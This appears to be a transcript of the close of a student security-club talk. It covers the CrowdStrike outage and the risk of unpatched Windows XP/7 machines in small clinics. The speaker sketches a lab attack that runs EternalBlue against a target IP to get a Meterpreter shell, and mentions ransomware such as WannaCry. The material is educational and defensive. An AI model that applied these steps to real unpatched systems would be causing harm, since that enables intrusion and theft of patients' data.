And so, what happened was CrowdStrike is a endpoint security company, and so they sell a lot of services for you install on Windows usually, and they run at a pretty high level. And so they had pushed an update that had caused issues, and tons of computers were blue screening. Can't even do anything. Nope, it was just an update. It was just a poor update. The point I want to bring up too is that like there are still computers out. I don't know if you've been to like a dentist's office or a doctor's office and you see they're still running Windows 7. For God forbid Windows XP. I've not seen that in a long time.
Is XP even more vulnerable than 7?
Oh my God, yes. But yeah, like these people, they rely on these systems. They don't turn them off. They don't, restart them. They just leave them running. Computer does its job. It's there. It works. I come to work and I do what I need to do. They don't need to worry about updates or whatever. But like at the end of the day, that has patient information on there. It has your information. It has other people's information. It's the reason that the doctor can do their job. And they don't do anything. And it's just a lack of education, I think, in general around this field. Like, especially in rural areas, you won't find it as much here in Seattle because, I mean, they can probably afford or know somebody who works in IT and can help them. But like rural North Carolina, or like tons of states in the United States, like you can't go ask for help. You can't because it costs money. Like, oh, you want a consultation? Okay, well, you can pick up $1,000. And like, we're just a small clinic. Like, they can't afford for this. And so it's a huge threat. And it's still like, you can find clinics all over the United States that go bankrupt, or even just small companies in general because of this. They don't update their systems. They don't know anything about IT. They don't know anything that could happen, and their computers get hacked. And you can see what you could see what we could just do there with a little thing to play funny videos or audio and take screenshots of the webcam and the desktop and everything and send whatever you want. But, you could ransomware somebody. You could run WannaCry, and like you could charge money for their data. So it's a pretty real threat. But again, like now we're just to turn Windows Update on and turn the firewall on. It's a pretty safe machine. Like it's like all things considered, it's relatively safe. So it's not impenetrable, obviously, but it's definitely a lot safer than the way it is right now. Yeah, and that's kind of it for the presentation. I'll open up for if anybody has other questions, or I can spin up the exploit. If somebody wants to try the exploit themselves, we can, because it's you can do that now. It's sitting at the login screen, but I think you should still be able to. It's vulnerable right now, so if you just follow the steps that I had on, I don't have the slides shared over, but here, if you were to go do the exploit EternalBlue, provide the IP, provide the payload, you can go and get back to the Meterpreter shell, which I don't. Yeah, so let's find out. Yeah, any questions for anybody? Anybody else? Thoughts? That's kind of all I had today. I plan to have more in-depth stuff using that mini PC and this little Wi-Fi network. I'm surprised it worked as well as it did. It's very nice that everybody can follow along together. But yeah, and then I guess I'll bring up again, next week, Monday, we're having somebody visit. So I'll keep posted on the Discord and hopefully get some people to show up. So yeah.
Pretty sweet.
All right, I'm gonna stop the recording. And let's go ahead. Sweet. All right.